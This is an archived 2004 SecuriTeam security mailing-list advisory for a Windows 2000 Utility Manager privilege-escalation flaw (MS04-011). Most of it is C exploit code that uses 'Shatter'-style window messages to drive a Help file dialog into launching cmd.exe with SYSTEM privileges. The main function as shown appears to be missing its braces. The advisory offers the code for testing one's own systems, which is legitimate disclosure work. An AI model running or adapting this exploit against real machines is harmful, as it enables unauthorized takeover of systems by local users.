[EXPL] Utility Manager Local Privileges Escalation Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 04/18/04

  • Next message: SecuriTeam: "[NT] Microsoft Windows Utility Manager Vulnerability (MS04-11)"
    To: list@securiteam.com
    Date: 18 Apr 2004 10:47:27 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.

    - - - - - - - - -

      Utility Manager Local Privileges Escalation Exploit


    The Utility Manager in Microsoft Windows 2000 executes winhlp32.exe with
    system privileges, which allows local users to execute arbitrary code via
    a "Shatter" style attack using Windows messages, as demonstrated using the
    File Open dialog in the Help window. The following exploit code can be
    used to test your system for the mentioned vulnerability.


    // By Cesar Cerrudo cesar appsecinc com
    // Local elevation of priviliges exploit for Windows Utility Manager
    // Gives you a shell with system privileges
    // If you have problems try changing Sleep() values.

    #include <stdio.h>
    #include <windows.h>
    #include <commctrl.h>
    #include <Winuser.h>

    int main(int argc, char *argv[])
      HWND lHandle, lHandle2;
      POINT point;

      char sText[]="%windir%\\system32\\cmd.ex?";

      // run utility manager
      system("utilman.exe /start");

      // execute contextual help
      SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);

      // open file open dialog windown in Windows Help
      PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);

      // find open file dialog window
      lHandle = FindWindow("#32770","Open");

      // get input box handle
      lHandle2 = GetDlgItem(lHandle, 0x47C);

      // set text to filter listview to display only cmd.exe
      SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);

      // send return
      SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

      //get navigation bar handle
      lHandle2 = GetDlgItem(lHandle, 0x4A0);
      //send tab
      SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
      lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
      //get list view handle
      lHandle2 = GetDlgItem(lHandle2, 0x1);

      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
      // popup context menu
      PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);

      // get context menu handle
      point.x =10; point.y =30;

      SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
      SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
      SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

      SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window



    The information has been provided by <mailto:cesar@appsecinc.com> Cesar


    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] Microsoft Windows Utility Manager Vulnerability (MS04-11)"